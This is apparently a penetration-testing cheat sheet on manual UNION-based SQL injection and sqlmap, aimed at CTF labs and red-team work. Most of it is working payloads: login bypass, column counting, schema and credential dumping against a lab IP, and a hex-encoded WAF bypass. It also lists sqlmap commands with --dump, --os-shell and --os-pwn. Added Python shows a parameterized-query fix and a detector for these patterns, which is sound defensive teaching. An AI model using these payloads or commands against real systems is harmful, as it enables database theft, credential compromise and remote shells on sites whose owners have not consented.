SQL Injection
Professional Explanation of SQL Injection Payload Sequence
The following is a step-by-step breakdown of the typical SQL Injection payload sequence used to extract information from a database through an injectable parameter, usually during manual exploitation after a vulnerability has been identified with a tool such as sqlmap.
Step-by-Step Breakdown
1. Basic Boolean Bypass
' OR 1=1 -- -
Purpose: Classic SQL Injection to bypass authentication or logic filters.
Mechanism:
- The ' closes the original query string.
- OR 1=1 always evaluates to true, forcing the query logic to accept the input.
- -- - comments out the remainder of the SQL statement to avoid syntax errors.
Example Original Query:
SELECT * FROM users WHERE username = '' OR 1=1 -- -' AND password = 'xyz';
This makes the WHERE clause always true, often bypassing login screens.
2. Basic UNION Injection with NULL Placeholders
' UNION SELECT NULL,NULL,NULL,NULL -- -
Purpose: Determines the correct number of columns for successful UNION-based SQL Injection.
Mechanism:
- The ' closes the original query.
- UNION SELECT merges a controlled query result with the original result set.
- NULL values are placeholders to match the number of columns.
- -- - comments out the remaining code.
Attackers repeat this with different NULL counts until no SQL error occurs, indicating the correct column count for further exploitation.
3. Enumerating Table Names
' UNION SELECT NULL,NULL,NULL,table_name FROM information_schema.tables -- -
Purpose: Extracts table names from the database.
Mechanism:
- Once the number of columns is known (4 columns in this case), injects table_name from the information_schema.tables system table.
- information_schema.tables contains metadata about all tables in the database.
- The attacker aligns table_name with a visible column in the application's output to exfiltrate table names.
4. Enumerating Column Names of a Specific Table
' UNION SELECT NULL,NULL,NULL,column_name FROM information_schema.columns WHERE table_name='admin' -- -
Purpose: Extracts column names for a target table, here assumed to be "admin".
Mechanism:
- Targets information_schema.columns, which holds column metadata.
- The WHERE table_name='admin' clause filters columns belonging to the "admin" table.
- Again, aligns column_name with visible output to reveal column structure.
5. Extracting Sensitive Data from the Target Table
' UNION SELECT NULL,NULL,user,hash FROM admin -- -
Purpose: Dumps actual user data, such as usernames and password hashes, from the "admin" table.
Mechanism:
- Assumes two relevant columns exist in "admin": user and hash.
- Fills remaining columns with NULL to maintain column alignment.
- Displays credentials or hashes in the application's output.
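As an added illustration (not part of the original notes), the following Python script builds a constructed in-memory SQLite users table and runs the step 1 bypass payload and a two-column UNION payload against a query built by string concatenation and against the same query with bound parameters, showing why the sequence above works against the first form and not the second. SQLite stands in for the real backend (it has no information_schema, so the UNION reads from the constructed users table itself); the table, rows and function names are assumptions.

```python
import sqlite3

# Payloads from the sequence above: the step 1 bypass and a UNION variant
# trimmed to two columns to match the constructed query below.
BYPASS_PAYLOAD = "' OR 1=1 -- -"
UNION_PAYLOAD = "' UNION SELECT NULL, password FROM users -- -"


def make_db():
    """Constructed in-memory SQLite table standing in for the app's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def lookup_vulnerable(conn, username, password):
    """The 'before' form: input is pasted into the SQL text, so the quote,
    OR 1=1, UNION and -- - are all parsed as SQL syntax."""
    sql = (f"SELECT username, password FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, username, password):
    """Hardened form: bound parameters travel as data; the SQL text is fixed."""
    sql = "SELECT username, password FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


def demo():
    """Run both payloads through both query styles and return the row sets."""
    conn = make_db()
    return {
        "vulnerable_bypass": lookup_vulnerable(conn, BYPASS_PAYLOAD, "wrong"),
        "vulnerable_union": lookup_vulnerable(conn, UNION_PAYLOAD, "wrong"),
        "parameterized_bypass": lookup_parameterized(conn, BYPASS_PAYLOAD, "wrong"),
        "parameterized_union": lookup_parameterized(conn, UNION_PAYLOAD, "wrong"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

With the concatenated query the bypass returns every row and the UNION returns every password; with bound parameters both lookups return nothing, because the payload is compared literally against the username column.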
6. Advanced Injection
To retrieve one specific user's information through the web parameter:
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20FROM%20users%20WHERE%20id=2
To count the rows in the users table:
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,COUNT(*),3,4,5%20FROM%20users
To find table names in the current database:
10.10.19.83/item.php?id=5 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()
To bypass a WAF by hexadecimal obfuscation:
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,GROUP_CONCAT(column_name),3,4,5%20FROM%20information_schema.columns%20WHERE%20table_name=0x7573657273
0x7573657273 is the hexadecimal encoding of the string users.
To find the database server version:
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5
To find the database name:
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5
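A defender-side check, added here as an example that is not from the original notes: it URL-decodes each query parameter, rewrites the 0x... hex literal used in the WAF-bypass URL back into its quoted string, and flags the UNION SELECT, information_schema and version()/database()/user() markers seen in the URLs above. The request paths are constructed samples modelled on those URLs, and the indicator names are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed request paths modelled on the item.php URLs above (not real traffic);
# the last two are benign so the checks can be seen to stay quiet on normal input.
SAMPLE_REQUESTS = [
    "/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20FROM%20users%20WHERE%20id=2",
    "/item.php?id=5%20UNION%20SELECT%201,GROUP_CONCAT(column_name),3,4,5%20FROM"
    "%20information_schema.columns%20WHERE%20table_name=0x7573657273",
    "/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5",
    "/item.php?id=5",
    "/search.php?q=union+station+timetable",
]

HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),
    ("schema_probe", re.compile(r"\binformation_schema\.", re.I)),
    ("db_fingerprint", re.compile(r"\b(?:version|database|user)\s*\(\s*\)", re.I)),
    ("tautology", re.compile(r"\bor\b\s+1\s*=\s*1\b", re.I)),
    ("comment_terminator", re.compile(r"--\s|/\*")),
]


def decode_hex_literals(text):
    """Rewrite MySQL-style 0x... literals as quoted strings so the hex form
    used for WAF bypass is matched by the same rules as the plain form."""
    def repl(match):
        try:
            return "'" + bytes.fromhex(match.group(1)).decode("ascii") + "'"
        except ValueError:  # odd length or non-ASCII bytes: leave untouched
            return match.group(0)
    return HEX_LITERAL.sub(repl, text)


def analyse(request_path):
    """Return (parameter, indicator) pairs found in one request's query string.
    parse_qsl percent-decodes, so %20 and + are already spaces here."""
    hits = []
    for name, value in parse_qsl(urlsplit(request_path).query, keep_blank_values=True):
        normalised = decode_hex_literals(value)
        hits.extend((name, label) for label, pat in INDICATORS if pat.search(normalised))
    return hits


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req, "->", analyse(req) or "clean")
```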
Summary of the Attack Progression
Initial Bypass: Forces true condition to bypass authentication.
Column Count Discovery: Tests different column counts for successful UNION injection.
Table Enumeration: Identifies all available tables using system metadata.
Column Enumeration: Extracts column names for specific target tables.
Data Extraction: Dumps credentials or other sensitive information.
This is a classic manual UNION-based SQL Injection sequence, allowing an attacker to escalate from basic access to full database compromise through systematic information extraction.
Additional Related Payload Variations
| Payload | Purpose |
|---|---|
| ' ORDER BY N -- - | Finds the number of columns by observing errors |
| ' UNION SELECT 1,2,3,4 -- - | Tests which columns reflect output |
| ' UNION SELECT NULL,@@version,NULL,NULL -- - | Reveals database version |
| ' UNION SELECT NULL,user(),NULL,NULL -- - | Reveals database user |
| ' UNION SELECT NULL,database(),NULL,NULL -- - | Reveals current database name |
This methodology is fundamental during Red Team engagements, CTFs, and vulnerability assessments where SQL Injection is present.
Reference: https://github.com/payloadbox/sql-injection-payload-list
sqlmap
Professional Explanation of the Command
sqlmap -u "store.cybercrafted.thm/xxxxxx.php" --method POST --data "search=doesnt&submit=matter" -p search --batch --dump
Detailed Breakdown
sqlmap: An automated SQL Injection exploitation tool used by Red Teams, penetration testers, and security researchers to detect and exploit SQL Injection vulnerabilities in web applications.
Arguments and Options
-u "store.cybercrafted.thm/xxxxxx.php": Target URL of the vulnerable endpoint, likely accepting user input that interacts with the backend database.
--method POST: Specifies the HTTP request method to be used. In this case, a POST request rather than the default GET.
--data "search=doesnt&submit=matter": The POST request body sent to the server. The parameter search is assumed to be user-controllable and vulnerable; submit=matter is likely a static parameter required for form submission.
-p search: Explicitly tells sqlmap to test only the search parameter for SQL Injection, optimizing the scan and reducing noise.
--batch: Runs sqlmap in non-interactive mode, automatically using default answers for prompts. Essential for scripting, automation, or CI/CD scenarios where no human intervention is desired.
--dump: After detecting a successful SQL Injection, sqlmap automatically dumps the contents of the target database, typically extracting entire tables or databases.
How It Works
- Sends crafted SQL payloads within the search parameter of a POST request to store.cybercrafted.thm/xxxxxx.php.
- Detects the presence and type of SQL Injection vulnerability.
- Upon successful exploitation, extracts data from the target database using --dump.
This approach is commonly used to enumerate databases, tables, and potentially sensitive information (credentials, emails, etc.) during security assessments or CTF challenges.
Available Additional Arguments for sqlmap
| Argument | Description |
|---|---|
| --risk=LEVEL | Defines risk level (1 to 3) for payload complexity |
| --level=LEVEL | Specifies the extent of tests (1 to 5) |
| --dbs | Enumerates databases only, no data dump |
| --tables | Lists tables in a specific database |
| --columns | Shows column names for a selected table |
| --os-shell | Attempts to spawn an operating system shell if SQL Injection allows |
| --os-pwn | Attempts full exploitation (reverse shell, meterpreter, etc.) |
| --proxy <url> | Routes traffic through a proxy (e.g., Burp Suite) |
| --threads <N> | Parallelizes requests to improve performance |
| --cookie <data> | Adds custom cookies to the request |
Example Variants
Basic database enumeration:
sqlmap -u "http://target.com/page.php?id=1" --dbs
Specifying a cookie and using a proxy:
sqlmap -u "http://target.com/page.php" --cookie "PHPSESSID=abc123" --proxy "http://127.0.0.1:8080" --tables
Interactive shell exploitation:
sqlmap -u "http://target.com/page.php?id=1" --os-shell
Summary
This command launches an automated SQL Injection attack against a specific parameter (search) within a POST request, operating non-interactively to extract database content if successful. It is a standard, efficient, and aggressive tactic during Red Team operations, vulnerability assessments, or CTF challenges to compromise backend databases.